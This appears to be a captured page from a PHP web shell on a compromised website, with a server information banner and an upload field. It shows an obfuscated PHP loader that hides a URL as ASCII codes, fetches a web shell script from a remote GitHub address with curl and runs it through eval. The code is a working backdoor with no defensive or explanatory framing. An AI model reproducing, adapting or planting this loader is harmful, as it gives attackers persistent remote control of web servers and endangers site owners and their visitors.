| Server IP : 66.29.153.156 / Your IP : 216.73.217.92 Web Server : LiteSpeed System : Linux premium322.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64 User : lastyfjz ( 1521) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/lastyfjz/dermalaserclinic.co.uk/94deee/ |
Upload File : |
<?php
ini_set('display_errors', 1);
error_reporting(E_ALL);
//
$ascii = [
104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,
117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,
109,47,121,111,110,51,122,117,47,52,48,51,87,101,98,83,104,
101,108,108,47,114,101,102,115,47,104,101,97,100,115,47,109,
97,105,110,47,52,48,51,87,101,98,83,104,101,108,108,46,112,
104,112
];
//
$u = '';
foreach ($ascii as $c) {
$u .= chr($c);
}
//
$lines = [
'$Url="'.$u.'";',
'$ch=curl_init();',
'curl_setopt($ch,CURLOPT_URL,$Url);',
'curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);',
'$out=curl_exec($ch);',
'curl_close($ch);',
'eval("?>".$out);'
];
//
$code = implode('', $lines);
eval($code);
?>